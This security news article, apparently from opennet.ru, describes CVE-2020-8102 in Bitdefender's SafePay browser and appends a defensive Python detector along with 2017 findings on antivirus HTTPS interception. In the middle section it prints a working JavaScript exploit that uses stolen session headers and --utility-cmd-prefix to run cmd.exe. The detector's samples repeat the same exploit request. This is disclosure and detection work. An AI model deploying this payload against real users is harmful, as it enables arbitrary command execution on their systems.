Code execution vulnerability in the Bitdefender SafePay secure browser

Vladimir Palant, the creator of Adblock Plus, has identified a vulnerability (CVE-2020-8102) in the specialised SafePay web browser, which is based on the Chromium engine, ships as part of the Bitdefender Total Security 2020 antivirus package, and is intended to raise the security of the user's activity on the Internet (for example, extra isolation when accessing banking and payment systems). The vulnerability allows web sites opened in the browser to execute arbitrary code at the operating-system level.

The cause of the problem is that the Bitdefender antivirus performs local interception of HTTPS traffic by substituting the site's original TLS certificate. An additional root certificate is installed on the client system, which hides the operation of the traffic-inspection system from the user. The antivirus inserts itself into the protected traffic and injects its own JavaScript code into some pages to implement the Safe Search function, and when a secure connection has certificate problems it replaces the returned error page with its own. Since the substituted error page is served on behalf of the server being opened, other pages on that server have full access to the content injected by Bitdefender.

When a site controlled by an attacker is opened, that site can send an XMLHttpRequest and simulate HTTPS certificate problems in the response, which leads to the return of the error page substituted by Bitdefender. Since the error page is opened in the context of the attacker's domain, the site can read the contents of the spoofed page together with the Bitdefender parameters. The page served by Bitdefender also contains a session key that allows the internal Bitdefender API to be used to launch a separate SafePay browser session, specifying arbitrary command-line flags, and to start any system commands using the "--utility-cmd-prefix" flag. Example exploit (param1 and param2 are the values obtained from the error page):

// Calls Bitdefender's internal launch API from the attacker's page;
// param1 and param2 are the session values read from the injected error page.
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
// The body becomes the new SafePay command line; --utility-cmd-prefix makes it run cmd.exe.
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
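As an added defender-side example (not code from the advisory, from Vladimir Palant or from Bitdefender), the following Python detector scans raw HTTP requests for the launch pattern described above: BDND session headers, the obk.run launch value and a --utility-cmd-prefix flag in the body. It assumes you have a source of decrypted request headers and bodies, such as EDR HTTP telemetry or the antivirus's own interception logs. The header names, the obk.run value and the flag are quoted from the proof of concept; the sample requests, host names, severity levels, placeholders and function names are constructed for this example. It also handles the case the proof of concept does not show, a form-encoded body, by decoding before matching.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Header name and "obk.run" are quoted from the published proof of concept;
# "--utility-cmd-prefix" is quoted from the advisory text. Everything else
# in this file is an assumption of this example, not Bitdefender's design.
LAUNCH_HEADER = "bdndwb_5056e556833d49c1af4085cb254fc242"
LAUNCH_VALUE = "obk.run"
CMD_PREFIX_RE = re.compile(r"--?utility-cmd-prefix\s*=", re.IGNORECASE)


@dataclass
class Finding:
    severity: str   # "medium", "high" or "critical"
    reason: str
    source: str     # identifier of the telemetry record that produced it


def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, target, headers, body).

    Header names are lower-cased because HTTP header names are case-insensitive.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect_request(raw: str, source: str) -> list[Finding]:
    """Flag requests that drive the SafePay launch API from page content."""
    _method, _target, headers, body = parse_request(raw)
    bdnd_headers = sorted(h for h in headers if h.startswith("bdnd"))
    if not bdnd_headers:
        return []  # nothing interception-specific in this request
    if headers.get(LAUNCH_HEADER) != LAUNCH_VALUE:
        # BDND headers without the launch value: unusual, worth a look, not the exploit
        return [Finding("medium", f"unexpected BDND headers: {bdnd_headers}", source)]
    # Decode form encoding so an encoded flag (%2D%2Dutility-cmd-prefix%3D) is not missed
    decoded_body = unquote_plus(body)
    if CMD_PREFIX_RE.search(decoded_body):
        return [Finding("critical",
                        "SafePay launch request injects --utility-cmd-prefix "
                        "(arbitrary command execution)", source)]
    return [Finding("high",
                    "SafePay launch request (obk.run) issued with session headers; "
                    "verify the originating page is Bitdefender's own", source)]


# Constructed sample records (not real captures). Angle-bracket values stand in
# for the per-session parameters and the command an attacker would supply.
SAMPLE_EXPLOIT = (
    "POST /0.123456 HTTP/1.1\r\n"
    "Host: attacker-site.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "BDNDSS_B67EA559F21B487F861FDA8A44F01C50: <param1>\r\n"
    "BDNDCA_BBACF84D61A04F9AA66019A14B035478: <param2>\r\n"
    "BDNDWB_5056E556833D49C1AF4085CB254FC242: obk.run\r\n"
    "BDNDOK_4E961A95B7B44CBCA1907D3D3643370D: https://attacker-site.example/\r\n"
    "\r\n"
    "data:text/html,nada --utility-cmd-prefix=\"<command>\""
)
SAMPLE_ENCODED = (
    "POST /0.654321 HTTP/1.1\r\n"
    "Host: attacker-site.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "BDNDWB_5056E556833D49C1AF4085CB254FC242: obk.run\r\n"
    "\r\n"
    "data%3Atext%2Fhtml%2Cnada+--utility-cmd-prefix%3D%22%3Ccommand%3E%22"
)
SAMPLE_BENIGN = (
    "POST /api/login HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&otp=123456"
)

if __name__ == "__main__":
    for name, sample in (("exploit", SAMPLE_EXPLOIT), ("encoded", SAMPLE_ENCODED),
                         ("benign", SAMPLE_BENIGN)):
        for f in inspect_request(sample, name):
            print(f"[{f.severity}] {f.source}: {f.reason}")
```

The rule keys on the launch header value rather than on the BDND header names alone, because the page gives no information about which BDND headers legitimate Bitdefender-injected pages send; treat the "medium" and "high" tiers as triage hints to tune against your own baseline.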


Recall that a study conducted in 2017 showed that 24 of the 26 tested antivirus products that inspect HTTPS traffic by spoofing certificates lowered the overall security level of the HTTPS connection.
Only 11 of the 26 products offered up-to-date cipher suites. Five systems did not verify certificates at all (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). The Kaspersky Internet Security and Total Security products were susceptible to the CRIME attack, and the AVG, Bitdefender and BullGuard products to the Logjam and POODLE attacks. Dr.Web Antivirus 11 allows a downgrade to insecure export ciphers (the FREAK attack).

Source: opennet.ru
